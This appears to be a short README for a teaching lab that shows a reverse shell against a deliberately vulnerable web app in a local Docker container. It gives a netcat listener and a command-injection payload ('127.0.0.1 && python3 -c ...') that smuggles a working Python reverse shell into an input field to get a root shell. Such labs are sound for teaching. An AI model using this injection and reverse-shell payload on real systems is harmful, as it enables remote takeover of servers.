A quick demo of a reverse shell.
**Note: If you don't have Docker installed, you can install it here.
-
Install dependancies:
npm i -
Build the docker image:
npm run docker:build -
Run the docker image:
npm run docker:start -
Go here in your web browser.
-
Listen to port 9999 on your computer:
nc -l 9999 -
Put this in the input field on the webpage (change where it says "CHANGE ME" to your computer's IP):
127.0.0.1 && python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("CHANGE ME",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' -
Press submit in the webpage and check your terminal where you entered the command in step 5.
- You can type
whoamito check if it worked. You should see "root"
- You can type